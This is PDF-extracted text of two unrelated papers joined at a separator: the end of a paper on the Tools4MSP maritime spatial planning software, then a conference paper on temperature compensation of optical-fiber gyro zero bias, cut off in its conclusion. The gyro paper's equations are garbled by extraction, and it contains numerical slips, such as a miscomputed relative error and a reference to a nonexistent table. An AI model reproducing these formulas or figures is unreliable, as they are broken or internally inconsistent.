and regional scale analysis for the Northern Adriatic Sea (Menegon et al., 2018b) and Emilia-Romagna Region (Barbanti et al., 2017a; Barbanti et al., 2017b). In the following section results for Tools4MSP GeoNode plugin and stand-alone library for the Adriatic Sea will be presented. Application of Tools4MSP GeoNode plugin The Tools4MSP GeoNode plugin implements two sets of interfaces: the case study setup GUI and the Webtool GUI. In Fig. 3 an example of GUI illustrating a case study setup is presented. The interface is intended for administrators and was designed to facilitate the configuration of case study input parameters. The GUI is organized in 4 sections: (i) basic parameters (Fig. 3A); (ii) human uses (Fig. 3B); (iii) environmental components (Fig. 3C); (iv) pressures (Fig. 3D). In the example the case study named ‘‘Adriatic Sea 2017’’ has a grid resolution of 500 m and the area of analysis is the Adriatic Sea (Fig. 3E). Figure 3F shows the expanded view of geospatial dataset set up for ‘‘Maritime Transport’’. Specific data transformation operations have been configured through the ‘‘Pre-processing expression’’ field. The expression is written with a Python-based syntax that allows the user to select and combine one or more layers, apply filters, apply masking conditions, perform grid-cell-based arithmetic and other data transformations (e.g., normalization, logarithmic scaling, gaussian convolution). The resulting geospatial dataset is shown as thumbnail directly into the case study setup GUI (Fig. 3F). The example reported in Fig. 3F refers to a human use (Maritime Transport) but is equally valid to environmental components or pressures. The Webtool GUI is the standard interface allowing non-technical users (e.g., decision- makers, MSP stakeholders, planners) to perform CEA and MUC analyses starting from the pre-set case studies. The Webtool GUI implements a four-steps workflow: (Step 0) Webtool selection; (Step 1) Case study area selection; (Step 2) Study area selection & Dataset configuration; (Step 3) Geospatial and statistical outputs. An example of the outputs (Step 3: Results) for the case study ‘‘Adriatic Sea 2017’’ is shown in Fig. 4. Through the GUI, the geospatial Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 7/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.165 Figure 3 Example of Case Study setup Graphical User Interface. Full-size DOI: 10.7717/peerjcs.165/fig-3 distribution of CEA for the analysis area as well as the statistical outputs can be explored and downloaded. A complete example of MUC and CEA analysis through the Tools4MSP webtool GUI including a more in-depth investigation on its strengths and limitations in support of Maritime Spatial Planning is available in Menegon et al. (2018b). Application of Tools4MSP package as stand-alone library In this section we present a cumulative effects assessment based on the stand-alone Tools4MSP package applied for the Adriatic Sea. The case study set up has been downloaded from the Tools4MSP Geoplatform. It consists of a directory named ‘‘adriatic_sea’’ containing the input geospatial layers related to human uses, environmental components and pressures and environmental component sensitivities. An example of the case study set up is released within the Tools4MSP software package (https://github.com/CNR- ISMAR/tools4msp/tree/master/data/demo_case_study) and is available for test and demo purposes. The case study is presented using a workflow implemented through the Jupyter computational environment including the following steps (Fig. 5): • In [1] Import libraries: Tools4MSP CaseStudy class, rectifiedgrid using the rg alias, matplotlib and numpy. CaseStudy is a comprehensive class that provides the methods to setup a case study (e.g., specify datasets and input parameters) or alternatively to load a predefined case study, perform the analysis and manage the results. • In [2] Load predefined case study for Adriatic Sea (1 km ×1 km resolution). After instantiating the CaseStudy class specifying the ‘‘adriatic_sea’’ case study, the methods load_layers and load_inputs are called in order to import the environmental, pressure and Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 8/16 https://peerj.com https://doi.org/10.7717/peerjcs.165/fig-3 https://github.com/CNR-ISMAR/tools4msp/tree/master/data/demo_case_study https://github.com/CNR-ISMAR/tools4msp/tree/master/data/demo_case_study http://dx.doi.org/10.7717/peerj-cs.165 Figure 4 Example of Graphical User Interface presenting geospatial and statistical results. Full-size DOI: 10.7717/peerjcs.165/fig-4 human use layers (including the layer metadata) and the input parameters respectively (e.g., sensitivity scores). • In [3] Print example case study setup providing general information on spatial extent (in number of cells) and number of available layers (geospatial datasets). The input geospatial layers and the area of analysis layer (.grid parameter) are instances of the RectifiedGrid class. RectifiedGrid is the main class provided by the rectifiedgrid library and it is designed to represent and manipulate 2D georeferenced data arrays. RectifiedGrid provides the ‘‘.plotmap’’ method to plot the layer and other information (e.g., coastline, rivers) on a map. • In [4] CEA analysis function. The CaseStudy class exposes the ‘‘.cumulative_impact’’ method to perform a Cumulative Effects Assessment (Menegon et al., 2018a). • In [5] CEA geospatial results and graphical outputs for the Adriatic Sea. The map of the CEA result is visualized using the ‘‘.plotmap’’ method in combination with the distribution of CEA values of the grid cells. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 9/16 https://peerj.com https://doi.org/10.7717/peerjcs.165/fig-4 http://dx.doi.org/10.7717/peerj-cs.165 Figure 5 Workflow for Tools4MSP stand-alone library application using Jupyter computational envi- ronment. Full-size DOI: 10.7717/peerjcs.165/fig-5 Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 10/16 https://peerj.com https://doi.org/10.7717/peerjcs.165/fig-5 http://dx.doi.org/10.7717/peerj-cs.165 Table 1 Software characteristics, requirements and availability for RectifiedGrid library and Tools4MSP package. RectifiedGrid Tools4MSP Language Python Python Operating system Platform-independent; requires Python distribution Platform-independent; requires Python distribution Dependencies Numpy, GeoPandas, Scipy, Rasterio, Fiona, Shapely, Rtree, Affine, Matplotlib, GDAL RectifiedGrid, Bokeh, GeoNode (for plugin usage) Software location DOI: 10.5281/zenodo.1185428 DOI: 10.5281/zenodo.1186160 Code repository https://github.com/CNR-ISMAR/rectifiedgrid https://github.com/CNR-ISMAR/tools4msp License GPL 3 GPL 3 Software details In Table 1 the summary of the main characteristics and requirements of RectifiedGrid and Tools4MSP is presented. DISCUSSION AND CONCLUSIONS This paper presents architecture, implementation and practical application of an MSP- oriented software package named Tools4MSP. The tool is presented as GeoNode plugin and as a stand-alone library determining different levels of usability by different user groups. As a plugin, Tools4MSP supports a wide user community that facilitates the implementation of collaborative analyses improving the reusability and sharing of the result outputs. The integration within a Geospatial CMS allows to manage the entire processing data workflow, from the collaborative upload in a web portal, to the creation of metadata, the choice of appropriate visual encodings, the composition of maps, the set up of use cases and the elaboration through specific modules producing final maps and descriptive reports. The usage of the plugin is particularly suitable as it provides a user-friendly interface appropriate to decision-makers, regional authorities, academics and MSP stakeholders (e.g., fishers, eNGOs, industry). The plugin eases data transformation operations reducing the need of manual data preparation and standardization procedures. Furthermore, archiving the pre-processing expressions in combination with the case study makes the transformation of the input data more explicit and the entire process more transparent and replicable. As stand-alone library, Tools4MSP requires advanced programming skills for its usage, but provides more flexible integration with other libraries and Python packages also outside Tools4MSP modelling framework. It is particularly suitable for planning authorities seeking advanced modelling procedure for MSP/ICZM and management purposes. The scientific community, consultancies and programmers can use and further develop the library for different research objectives and integration into Decision-Support-Systems. Compared to other existing decision support tools in MSP, the Tools4MSP ‘‘approach’’ is more flexible as it (1) incorporates a multi-objective toolset (CEA and MUC) which can be extended for other analysis purposes (e.g., scenario analysis, comparative MSP or ecosystem services assessment); (2) it enables management and treatment of different datasets and Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 11/16 https://peerj.com http://doi.org/10.5281/zenodo.1185428 http://doi.org/10.5281/zenodo.1186160 https://github.com/CNR-ISMAR/rectifiedgrid https://github.com/CNR-ISMAR/tools4msp http://dx.doi.org/10.7717/peerj-cs.165 formats and (3) it provides different levels of usability ranging from experienced modellers to more user-friendly modelling through GUIs. The tools CEA and MUC models implemented can support the development of maritime spatial plans within the implementation process of the MSP Directive (2014/89/CE) in various case study areas and marine waters in the Mediterranean Sea and beyond. The package is regularly upgraded within the Tools4MSP Geoplatform (data.tools4MSP.eu) including ongoing implementations of pressure specific analysis of CEA, CEA backsourcing (CEA-B; Menegon et al., 2018a) and the integration of marine ecosystem services oriented analysis of anthropogenic threats (MES-Threat) in support of environmental management and resource restoration (Depellegrin & Blažauskas, 2013; Menegon et al., 2018b). The Tools4MSP software package was used in ADRIPLAN (ADRiatic and Ionian maritime spatial PLAnning) and RITMARE (Ricerca ITaliana per il MARe) projects and is currently implemented by various research communities within ongoing European Projects around the Mediterranean, such as SUPREME (Supporting maritime spatial Planning in the Eastern Mediterranean) or PORTODIMARE (geoPortal of Tools & Data for sustainable Management of coAstal and maRine Environment). ACKNOWLEDGEMENTS We would like to thank the editor and the three reviewers for valuable comments contributing to the overall improvement of the manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Flagship Project RITMARE—Italian Research for the Sea, coordinated by the Italian National Research Council and funded by the Italian Ministry of Education, University and Research within the National Research Program 2011–2013. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Flagship Project RITMARE—Italian Research for the Sea. Italian Ministry of Education, University. National Research Program 2011–2013. Competing Interests The authors declare there are no competing interests. Author Contributions • Stefano Menegon analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.165 • Alessandro Sarretta and Daniel Depellegrin contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • Giulio Farella and Chiara Venier contributed reagents/materials/analysis tools. • Andrea Barbanti contributed reagents/materials/analysis tools, founding acquisition, Supervision. Data Availability The following information was supplied regarding data availability: Stefano Menegon. (2018, February 28). Tools4MSP: Geospatial tools to support Maritime Spatial Planning (Version 1.0.0-beta.3). Zenodo. DOI 10.5281/zenodo.1186160. Stefano Menegon. (2018, February 27). RectifiedGrid: Geospatial python library for grid-based analyses (Version 1.0.0-beta.4). Zenodo. DOI 10.5281/zenodo.1185428. REFERENCES Andersen JH, Stock A, Heinänen S, Mannerla M, Vinther M. 2013. Human uses, pressures and impacts in the eastern North Sea. Technical Report from DCE— Danish Centre for Environment and Energy No. 18. Aarhus: Aarhus University. Available at http://www.dmu.dk/pub/tr18.pdf . Barbanti A, Campostrini P, Musco F, Sarretta A, Gissi E. 2015. Developing a mar- itime spatial plan for the adriatic ionian region. Zenodo. Venice: CNR-ISMAR. DOI 10.5281/zenodo.48231. Barbanti A, Sarretta A, Venier C, Bellaciccio S, Depellegrin D, Farella G, Mene- gon S, Lorito S, Grati F, Bolognini L, Perini L. 2017a. Sviluppo ed analisi di proposte di ICZM-MSP in aree specifiche: costa emiliano-romagnola. Volume 1: Quadro conoscitivo di riferimento e sua analisi ai fini della pianificazione dello spazio marittimo ICM-MSP nella Regione Adriatico Ionica. Zenodo. DOI 10.5281/zenodo.1160726. Barbanti A, Sarretta A, Venier C, Bellacicco S, Farella G, Menegon S, Depellegrin D, Lorito S, Grati F, Bolognini L, Perini L, Pastres R, Porporato E. 2017b. Sviluppo ed analisi di proposte di ICZM-MSP in aree specifiche: costa emiliano-romagnola. Volume 2: Individuazione ed analisi dei possibili obiettivi gestionali e delle misure per attuarli. Zenodo. DOI 10.5281/zenodo.1160720. Bokeh Development Team. 2018. Bokeh: Python library for interactive visualization. Available at http://www.bokeh.pydata.org/ (accessed on 20 February 2018). Boundless. 2018. GeoServer explorer plugin for QGIS. Available at http://boundlessgeo. github.io/qgis-plugins-documentation/geoserver/ (accessed on 20 February 2018). Center for Ocean Solutions. 2011. Decision guide for selecting decision support tools for marine spatial planning. Technical report. Stanford: The Woods Institute for the Environment, Stanford University. De Longueville B. 2010. Community-based geoportals: the next generation? Concepts and methods for the geospatial Web 2.0. Computers, Environment and Urban Systems 34(4):299–308 DOI 10.1016/j.compenvurbsys.2010.04.004. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 13/16 https://peerj.com http://doi.org/10.5281/zenodo.1186160 http://doi.org/10.5281/zenodo.1185428 http://www.dmu.dk/pub/tr18.pdf http://dx.doi.org/10.5281/zenodo.48231 http://dx.doi.org/10.5281/zenodo.1160726 http://dx.doi.org/10.5281/zenodo.1160720 http://www.bokeh.pydata.org/ http://boundlessgeo.github.io/qgis-plugins-documentation/geoserver/ http://boundlessgeo.github.io/qgis-plugins-documentation/geoserver/ http://dx.doi.org/10.1016/j.compenvurbsys.2010.04.004 http://dx.doi.org/10.7717/peerj-cs.165 Depellegrin D, Blažauskas N. 2013. Integrating ecosystem service values into oil spill im- pact assessment. Journal of Coastal Research 29(4):836–846 DOI 10.2112/JCOASTRES-D-11-00191.1. Depellegrin D, Menegon S, Farella G, Ghezzo M, Gissi E, Sarretta A, Venier C, Barbanti A. 2017. Multi-objective spatial tools to inform maritime spatial planning in the Adriatic Sea. Science of the Total Environment 609:1627–1639 DOI 10.1016/j.scitotenv.2017.07.264. Douvere F. 2008. The importance of marine spatial planning in advancing ecosystem- based sea use management. Marine Policy 32(5):762–771 DOI 10.1016/j.marpol.2008.03.021. European Union. 2014. Directive 2014/89/EU of the the European Parliament and of the Council of 23 July 2014 establishing a framework for maritime spatial planning. O.J. L 257/135. Available at https://eur-lex.europa.eu/legal-content/EN/TXT/?uri= CELEX%3A32014L0089. Fiona, Developers and Contributors team. 2018. Fiona is OGR’s neat, nimble, no- nonsense API for Python programmers. Available at http://toblerity.org/fiona/ (accessed on 20 February 2018). GeoNode, Developers and Contributors team. 2018. GeoNode: open source geospatial content management system. Available at http://geonode.org/ (accessed on 20 February 2018). Georis-Creuseveau J, Claramunt C, Gourmelon F. 2016. A modelling framework for the study of spatial data infrastructures applied to coastal management and planning. International Journal of Geographical Information Science 31:122–138 DOI 10.1080/13658816.2016.1188929. Gramolini R, Grati F, Fabi G, Schule T. 2010. GRID GeoReference interactions database. Deliverable D39 COEXIST Project. Interaction in coastal waters: a roadmap to sustainable integration of aquaculture and fisheries. Available at http://www. coexistproject.eu/images/COEXIST/Tools/GRID.pdf . Hadjimitsis DG, Agapiou A, Themistocleous K, Mettas C, Evagorou E, Papoutsa C, Nisantzi A, Mammouri R, Tzouvaras M, Lysssandrou V. 2015. Resolving sea and land conflicts in Cyprus using marine spatial planning. In: Proceedings of the 14th international conference on environmental science and technology CEST 2015. Athens, Greece. Halpern BS, McLeod KL, Rosenberg AA, Crowder LB. 2008. Managing for cumulative impacts in ecosystem-based management through ocean zoning. Ocean & Coastal Management 51(3):203–211 DOI 10.1016/j.ocecoaman.2007.08.002. Judd AD, Backhaus T, Goodsir F. 2015. An effective set of principles for practical implementation of marine cumulative effects assessment. Environmental Science & Policy 54:254–262 DOI 10.1016/j.envsci.2015.07.008. Kluyver T, Ragan-Kelley B, Pérez F, Granger B, Bussonnier M, Frederic J, Kel- ley K, Hamrick J, Grout J, Corlay S, Ivanov P, Avila D, Abdalla S, Willing C. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 14/16 https://peerj.com http://dx.doi.org/10.2112/JCOASTRES-D-11-00191.1 http://dx.doi.org/10.1016/j.scitotenv.2017.07.264 http://dx.doi.org/10.1016/j.marpol.2008.03.021 https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A32014L0089 https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A32014L0089 http://toblerity.org/fiona/ http://geonode.org/ http://dx.doi.org/10.1080/13658816.2016.1188929 http://www.coexistproject.eu/images/COEXIST/Tools/GRID.pdf http://www.coexistproject.eu/images/COEXIST/Tools/GRID.pdf http://dx.doi.org/10.1016/j.ocecoaman.2007.08.002 http://dx.doi.org/10.1016/j.envsci.2015.07.008 http://dx.doi.org/10.7717/peerj-cs.165 2016. Jupyter notebooks—a publishing format for reproducible computa- tional workflows. In: Loizides F, Schmidt B, eds. Positioning and power in aca- demic publishing: players, agents and agendas. Amsterdam: IOS Press, 87–90 DOI 10.3233/978-1-61499-649-1-87. Korpinen S, Meidinger M, Laamanen M. 2013. Cumulative impacts on seabed habitats: an indicator for assessments of good environmental status. Marine Pollution Bulletin 74(1):311–319 DOI 10.1016/j.marpolbul.2013.06.036. Maguire DJ, Longley PA. 2005. The emergence of geoportals and their role in spatial data infrastructures. Computers, Environment and Urban Systems 29(1):3–14 DOI 10.1016/S0198-9715(04)00045-6. Mapbox, Rasterio Development Team. 2018. Rasterio: access to geospatial raster data. Available at https://mapbox.github.io/rasterio/ (accessed on 20 February 2018). McGibbon RT, Beauchamp KA, Harrigan MP, Klein C, Swails JM, Hernández CX, Schwantes CR, Wang L-P, Lane TJ, Pande VS. 2015. MDTraj: a modern open library for the analysis of molecular dynamics trajectories. Biophysical Journal 109:1528–1532 DOI 10.1016/j.bpj.2015.08.015. Menegon S. 2018a. Tools4MSP geospatial tools to support maritime spatial planning. Zenodo. Version 1.0.0-beta.3. DOI 10.5281/zenodo.1186160. Menegon S. 2018b. RectifiedGrid geospatial Python library for geospatial grid-based analyses. Zenodo. Version 1.0.0-beta.4. DOI 10.5281/zenodo.1185428. Menegon S, Depellegrin D, Farella G, Gissi E, Ghezzo M, Sarretta A, Venier C, Barbanti A. 2018a. A modelling framework for MSP-oriented cumulative effects assessment. Ecological Indicators 91:171–181 DOI 10.1016/j.ecolind.2018.03.060. Menegon S, Depellegrin D, Farella, Sarretta A, Venier C, Barbanti A. 2018b. Addressing cumulative effects, maritime conflicts and ecosystem services threats through MSP-oriented geospatial webtools. Ocean & Coastal Management 163:417–436 DOI 10.1016/j.ocecoaman.2018.07.009. OGC—Open Geospatial Consortium Inc. 2006. OpenGIS Web Map Server Implemen- tation Specification. Pınarbaşı K, Galparsoro I, Borja Á, Stelzenmüller V, Ehler CN, Gimpel A. 2017. Decision support tools in marine spatial planning: present applications, gaps and future perspectives. Marine Policy 83:83–91 DOI 10.1016/j.marpol.2017.05.031. QGIS Development Team. 2018. QGIS Geographic Information System. Open Source Geospatial Foundation Project. Available at https://www.qgis.org/ (accessed on 20 February 2018). Shen H. 2014. Interactive notebooks: sharing the code. Nature 515:151–152 DOI 10.1038/515151a. Stelzenmüller V, Lee J, South A, Foden J, Rogers SI. 2013. Practical tools to support ma- rine spatial planning: a review and some prototype tools. Marine Policy 38:214–227 DOI 10.1016/j.marpol.2012.05.038. Stock A. 2016. Open source software for mapping human impacts on marine ecosystems with an additive model. Journal of Open Research Software 4(1):e21 DOI 10.5334/jors.88. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 15/16 https://peerj.com http://dx.doi.org/10.3233/978-1-61499-649-1-87 http://dx.doi.org/10.1016/j.marpolbul.2013.06.036 http://dx.doi.org/10.1016/S0198-9715(04)00045-6 https://mapbox.github.io/rasterio/ http://dx.doi.org/10.1016/j.bpj.2015.08.015 http://dx.doi.org/10.5281/zenodo.1186160 http://dx.doi.org/10.5281/zenodo.1185428 http://dx.doi.org/10.1016/j.ecolind.2018.03.060 http://dx.doi.org/10.1016/j.ocecoaman.2018.07.009 http://dx.doi.org/10.1016/j.marpol.2017.05.031 https://www.qgis.org/ http://dx.doi.org/10.1038/515151a http://dx.doi.org/10.1016/j.marpol.2012.05.038 http://dx.doi.org/10.5334/jors.88 http://dx.doi.org/10.7717/peerj-cs.165 Van der Walt S, Colbert SC, Varoquaux G. 2011. The NumPy array: a structure for efficient numerical computation. Computing in Science Engineering 13:22–30 DOI 10.1109/MCSE.2011.37. Warmerdam F. 2008. The geospatial data abstraction library. In: Hall GB, Leahy MG, eds. Open source approaches in spatial data handling. Berlin, Heidelberg: Springer Berlin Heidelberg, 87–104 DOI 10.1007/978-3-540-74831-1_5. White C, Halpern BS, Kappel CV. 2012. Ecosystem service tradeoff analysis reveals the value of marine spatial planning for multiple ocean uses. Proceedings of the National Academy of Sciences of the United States of America 109:4696–4701 DOI 10.1073/pnas.1114215109. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 16/16 https://peerj.com http://dx.doi.org/10.1109/MCSE.2011.37 http://dx.doi.org/10.1007/978-3-540-74831-1_5 http://dx.doi.org/10.1073/pnas.1114215109 http://dx.doi.org/10.7717/peerj-cs.165 work_iuc5a5vyuvcflcj43d6khbokly ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 1 Analysis and Compensation About Temperature Influence to Optical-Fiber Gyro Zero Bias Zhou Haiyuan, Yang Heng, Wang Qianxue, Liu Xinming and Pan Liang China Satellite Maritime Tracking & Controlling Department Jiangyin, 214431, China e-mail: 562798794@qq.com Abstract—Compared to other gyro the dynamic performance of optical-fiber gyro was better and the price was cheap. Optical-fiber gyro was suit to build SINS. By the way, zero bias of optical-fiber gyro was sensitive to temperature, and the compensation technique was a hot point in INS research. According to the above situation, based on one type optical- fiber gyro, the influence mechanism about temperature to optical-fiber gyro zero bias was studied, and a test method was designed, the experiment results was analyzed, finally based on multinomial simulation a compensation math model was established, and the research result discovered that temperature was a big influence to optical-fiber gyro zero bias, and it can be fixed by a compensation math model based on multinomial simulation. Keywords-Multinomial Simulation; Gyro Zero Bias; Temperature Characteristic; Temperature Compensation; Temperature Sensor I. INTRODUCTION Gyro was the core component of inertial navigation equipment, and it was the key factor to determine the position and attitude accuracy of inertial navigation equipment. At present, the traditional liquid lifting gyro has entered the technical stability period, the accuracy has been difficult to break through; laser gyro technology has also been basically mature, and entered the stage of engineering application. Compared with the liquid lifting gyro, optical fiber gyro has the advantages of simple structure, fast starting, long service life, small volume and so on; Compared with the laser gyro, with lower price and higher dynamic performance, optical-fiber gyro was more suitable for construction of strap down inertial system. The temperature was main factors affecting the performance of optical-fiber gyro[1-4], the temperature change will lead to deviation from the original state of the optical-fiber gyro because of its optical element temperature sensitive character, which affects the output accuracy of the system, so the compensation about optical-fiber gyro zero bias caused by temperature change was most important problem to be solved to inertial navigation equipment based on optical-fiber gyro. II. INFLUENCE OF TEMPERATURE ON ZERO BIAS OF OPTICAL-FIBER GYRO A. Experimental design The optical-fiber gyro used in this experiment was a kind of advanced high precision, which requires the gyro performance index: zero bias stability was better than 0.02º/h, and the scale factor stability was better than 10ppm. Test hardware conditions include temperature control turntable and supporting facilities, the specific configuration was as follows: 1) Temperature control turntable The temperature range was between -20℃ and +60℃; the output range was 0.01º/s to 1000º/s; the rate stability was 1×10-4; the temperature stability was ±0.5℃. 2) Matching test facilities The vibration isolation foundation avoids the interference of external vibration to the test. The data acquisition device was used for the acquisition of gyro data, and the turntable control computer was used for the control of turntable and the collection of gyro data. Fig.1 was a connection diagram of temperature experimental equipment. The 2 temperature sensors were located at the top and the side of the gyro shell for recording the ambient temperature. After the gyro was started, the output of the gyro and the temperature of the temperature sensor were collected, and the sampling frequency was sampled 1 times per second. testing turntables fiber optic gyro data acquisition and processing system computer temperature output signal Control signal sensor 1 sensor 2 Figure 1. Equipment connection about temperature test B. Test result In order to test the temperature characteristics of the optical-fiber gyro, a total of 8 fixed temperature gyro zero bias tests were arranged according to the experimental scheme. 4 experiments were conducted at each fixed mailto:562798794@qq.com 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 2 temperature, and the results of an experiment were shown in table 1. TABLE I. RESULTS ABOUT GYRO ZERO BIAS ABOUT DIFFERENT TEMPERATURE Serial number Time length (s) Temperature (℃) Gyro zero bias mean value(º /h) Gyro zero bias standard deviation (º /h) Gyro zero bias standard deviation after 101 point moving smooth(º/h) 1 6161 -14.60 7.6967 0.9728 0.0433 2 8569 2.70 8.0374 1.0503 0.0475 3 8161 22.93 7.6844 0.9948 0.0640 4 4051 39.95 8.1986 0.6017 0.0893 5 8443 47.28 7.6761 1.1103 0.0268 6 9194 50.83 7.9121 0.9801 0.1145 7 8109 56.43 8.0771 1.0352 0.0479 8 8006 60.27 8.0594 1.0534 0.0495 C. Data analysis According to table 1 data, take the serial number 7 test as an example, the sensor temperature was 56.4℃, the gyro zero bias was 8.0771º/h, and the standard deviation was 1.0352 º/h, which shows that the noise of the gyro was random (random walk). The gyro zero bias was smoothed after 101 point moving average, and the standard deviation was reduced to 0.0479 º/h. After smoothing the data, the standard deviation was obviously smaller. Compared to the 8 sets of data, it can be found that the temperature has a larger influence on the gyro zero bias mean, the same to the test group of fifth temperature of 47.28 ℃ for the minimum output corresponding to the 7.6761º/h, fourth sets of temperature 39.95 ℃ corresponding to 8.1986 º/h for maximum output, relative error was 0.064%, the absolute error was 0.5225 º/h, the temperature must be corrected to compensate the effect of optical-fiber gyro zero bias. III. MODELING OF ZERO BIAS COMPENSATION From the IEEE to the temperature drift of optical-fiber gyro the definition: change of temperature was an important factor affecting the precision of optical-fiber gyro zero bias[5-6], the effect of temperature on the optical-fiber gyro zero bias mainly in three aspects of temperature, temperature change rate and temperature gradient. Based on the above three factors, the temperature drift of gyro can be fitted by polynomial, and the model structure was as follows: 0 1 1 1 （）           qm n i j k i j k i j k dT L L AT B C T dt (1) L----gyro output, unit º/h. L0----the zero bias output obtained from the first two minutes of sampling after the gyro was started, unit º/h. T ---- gyro sensitive temperature, unit ℃. Δ T ---- Temperature gradient of gyro, unit ℃. dT/dt ---- The temperature change rate of gyro unit ℃/s. Ai, Bj and Cj ---- polynomial coefficients, M, n -- the highest power of all temperature factors. The coefficients Ai, Bj and Cj in model polynomial were fitted by regression analysis and least square method. The polynomial model can be written as: 0 L - L = T a (2) 2 1 1 1 2 2 2 2 2                     q q q N N N T T T T T T T T T T 1 2               q a a a a Q was the order of the temperature drift model, and T was the temperature matrix, and N was the data number of gyro temperature drift. The coefficients fitted at different temperatures were different. The coefficients of Ai, Bj and Ck satisfy the following relation in formula (3): 2 3 1 10 11 1 12 1 13 1 2 3 2 20 21 2 22 2 23 2 2 3 0 1 2 3                   q q q q q q q q a A A T A T A T a A A T A T A T a A A T A T A T (3) The coefficient Aij (i=1,2…q；j=0,1,2,3) was obtained by least square calculation for each gyro at different temperatures. Solidify the coefficients in the computer test software. As long as the initial temperature T0 of the gyro was measured after the gyro was started, the coefficients in the model can be calculated according to formula (3). Then, according to the temperature factors, the zero bias compensation model of the current gyro was estimated by using polynomial model formula (1), and the estimated zero bias caused by temperature can be calculated and can be fixed. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 3 IV. OPTICAL-FIBER GYRO ZERO BIAS CHARACTERISTICS COMPENSATION RESULT The influence of temperature on zero bias was mainly shown in three aspects: temperature, temperature change rate and temperature gradient[7-8]. For a comprehensive analysis of the temperature character of zero bias of optical-fiber gyro, effect of temperature, effect of temperature change rate and effect of temperature gradient were all compensated. The highest temperature compensation to 4 order, 1 order compensation for temperature gradient temperature change rate, 1 order compensation for temperature gradient. A. Temperature affects compensation results Using the data in Table 1, the polynomial of temperature on the zero bias of the gyro was fitted to each order curve, and the result was shown in figure 2. According to the fitting results, the gyro zero bias data was compensated for the continuous change of temperature from -20℃ to 60℃ in Fig. 3, the 2 and 4 order compensation results were shown in figure 4. The comparison of the results of each order compensation was shown in table 2. test result Linear 1 order 2 order 3 order 4 order 5 order g y ro o u tp u t er ro r gyro temperature sensor 2 Figure 2. Polynomial fitting curve about the gyro zero bias caused by temperature g y ro o u tp u t a ft e r sm o o th g y ro te m p e ra tu re se n so r 2 Figure 3. The influence about temperature to gyro zero bias g y ro o u tp u t g y ro te m p e ra tu re s e n s o r 2 orginal output after smooth After 2 order compensation temperature g y ro o u tp u t g y ro te m p e ra tu re s e n s o r 2 orginal output after smooth After 4 order compensation temperature Figure 4. Gyro output by 2\4order polynomial compensation while temperature transition TABLE II. GYRO OUTPUT BY 1 TO 4ORDER POLYNOMIAL COMPENSATION WHILE TEMPERATURE TRANSITION Compensation method Gyro zero bias mean value(º/h) Gyro zero bias standard deviation (º/h) 1 none 8.4747 0.3274 2 linear 8.4416 0.3007 3 2order 8.4834 0.2946 4 3order 8.3944 0.3050 5 4order 8.4843 0.3197 From table 2, it can be seen that the standard deviation of gyro zero bias was smaller after compensation, and the two order polynomial compensation was the best. B. Compensation result of temperature gradient change The relationship between the temperature gradient and the gyro zero bias was shown in figure5. g y ro o u tp u t te m p e ra tu re g ra d ie n t gyro temperature sensor 2 gyro output temperature gradient Figure 5. Relationship between temperature gradient and gyro zero bias 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 4 Based on temperature compensation, temperature gradient compensation was added on the zero bias, the zero bias standard deviation was shown in table 3. TABLE III. THE RESULT AFTER ADDING COMPENSATION BY TEMPERATURE GRADIENT Compensation method Gyro zero bias mean value(º/h) Gyro zero bias standard deviation (º/h) 1 none 0.3274 -- 2 Linear 0.3007 0.2357 3 2order 0.2946 0.2299 4 3order 0.3050 0.2436 5 4order 0.3197 0.2569 According to the date from table 3, on the same order after adding the temperature gradient compensation the results was improved obviously, and two order polynomial compensation effect was the best, standard deviation was reduced to the original value of 2/3. C. Compensation result of temperature change rate In Figure 3, the difference between each point data and the average value can reflect the influence of the temperature change rate on the gyro zero bias to a certain extent. On the basis of considering the temperature and temperature gradient, the influence of temperature change rate on the gyro zero bias was also added. The 2 and 4 order fitting results were shown in fig 6. The comparison of the results of each order compensation was shown in table 4. orginal data 2 order compensation temperature gradient temperature transition rate g y ro o u tp u t orginal data 4 order compensation temperature gradient temperature transition rate g y ro o u tp u t Figure 6. Gyro output by 2\4order polynomial compensation after temperature transition\temperature gradient\temperature transition rate TABLE IV. COMPENSATION RESULT AFTER TEMPERATURE TRANSITION\TEMPERATURE GRADIENT\TEMPERATURE TRANSITION RATE Compensation Method Gyro zero bias mean value(º/h) Gyro zero bias standard deviation (º/h) 1 none 8.4747 0.3274 2 Linear 8.4747 0.1556 3 2order 8.4747 0.1269 4 3order 8.4747 0.1103 5 4order 8.4747 0.1017 From table 5 and Figure 4 can be seen through the “four order polynomial + temperature difference + change rate of the temperature ”compensation effect was obvious, the gyro zero bias standard deviation can be reduced to 1/3 by the fitting," the compensation effect was obvious. V. CONCLUSION Temperature was one of the most important factors that affect the zero bias of optical-fiber gyro. The temperature characteristics about optical-fiber gyro has to be studied and zero bias caused by the temperature changes must be compensated if optical-fiber gyro can be used in the field of engineering application. Based on the analysis of the influence mechanism of optical-fiber gyros working principle and temperature influence to zero bias, temperature test of optical-fiber gyro was carried out, zero bias compensation method was studied, and the 